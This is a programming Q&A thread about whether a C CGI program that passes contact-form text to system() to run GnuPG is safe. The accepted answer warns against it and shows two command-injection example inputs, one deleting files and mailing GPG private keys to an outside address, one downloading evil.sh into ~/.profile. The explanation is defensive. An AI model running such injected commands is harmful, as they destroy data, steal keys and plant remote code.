# Is running a C/C++ CGI script on Apache dangerous?

Tags: forms, security, cgi, exec, gnupg

I am currently programming my own little website system (a script that compiles Markdown documents, and puts them in appropriate locations, thus making a quick, static website).
I would like to enable people who go to my (initially static) contact page, to send me a [GnuPG](http://www.gnupg.org/)-encrypted message.

Basically, the visitor writes his or her message in a contact form, clicks this checkbox if they want the message to be encrypted, and upon receiving the form, a C(?) program of mine calls `system("gpg --encrypt --recipient 31A49121CD42FF00 --armor <the_message>");`

(I have yet to determine how to effectively get the message contents and use it in a command without writing the unencrypted message to disk).

**Is it (un)secure to use `exec()` in a self-made C program that processes form data?** Is there a simpler way to achieve what I want to do (using a standalone script—because my website is static—to run GPG)? Any security considerations I haven’t thought about?

I am asking on here instead of Security SE because I am looking for answers with developers’ points of view.

Answer (score 4, accepted):

As a security professional who makes at least a modest living consulting on the subject, and a rather prolific C programmer I can give you a few different thoughts on the subject.

When you are considering security of processes executing on your target, you have to consider a number of things and how someone may abuse the situation.

## A glimpse

Let's look at the immediate security problem that I see just off hand, you are using the "system()" call directly on `<the_message>` ; Can you imagine the following:

```
the_message="hello and goodbye; rm -rf *; cat $HOME/.gpg/* | /usr/bin/sendmail -s 'these are the private keys' temporary_account@hotmail.com" or worse;

the_message="hello and goodbye; wget http://some.remote.system.com/evil.sh && mv evil.sh ~/.profile;"
```

So the first thing to do is never use anything provided by a user as a command or part of a command-line; save the message to a temporary text file and encrypt that;

## A slightly deeper look

Okay so what's going on in terms of using C; Before I give you the answer, I would like to say I love C; I almost exclusively program in C and have been a professional developer with main focus on C for last 24 years. Now, I would like to say that C is a horrid tool for writing a CGI program in, and you should only do it if you have a truly compelling reason. And after you find that reason, you should discard it anyways and abandon the thought.

#### Here are some reasons why you SHOULDN'T use C for a CGI interface.

CGI/1.1 is an ugly standard; It uses environment variables, stdin, and all sorts of character remapping and recoding just to get data across. You are invariably going to have to deal with either implementing a cgi interface or using libcgi or some equivalent library in order to deal with all the permutations, and at the end you'll just hate yourself for it.

When I used http://libcgi.sourceforge.net for a particular project I had to debug and harden and augment it because it had some horrible buffer over flow issues left right and center, non-existant utf-8 support and limited control over authentication.

But even if you have that covered, C is generally a bad idea because a lot of the security issues arise out of the manual manipulation of memory that one has to do.

A higher level language (shell script, awk, perl, php etc.) is a much better tool to handle CGI; Perl was almost built for it, and PHP was specially built for it. Another advantage of using perl or PHP in your situation is that GnuPG modules are available so that you don't have to system() anything;

The key to good development is to use the easiest, most straightforward toolkit for the job; In your case I think you should NOT use C, as it would force you to do things that are already very well done for you in form of a proper CGI processing language such as PHP.

Those are my thoughts; I hope that you will

Comment: One should never call himself expert in anything. It is something that only somebody else may call you

Comment: @mvp :) I did probably put my foot in my mouth didn't I.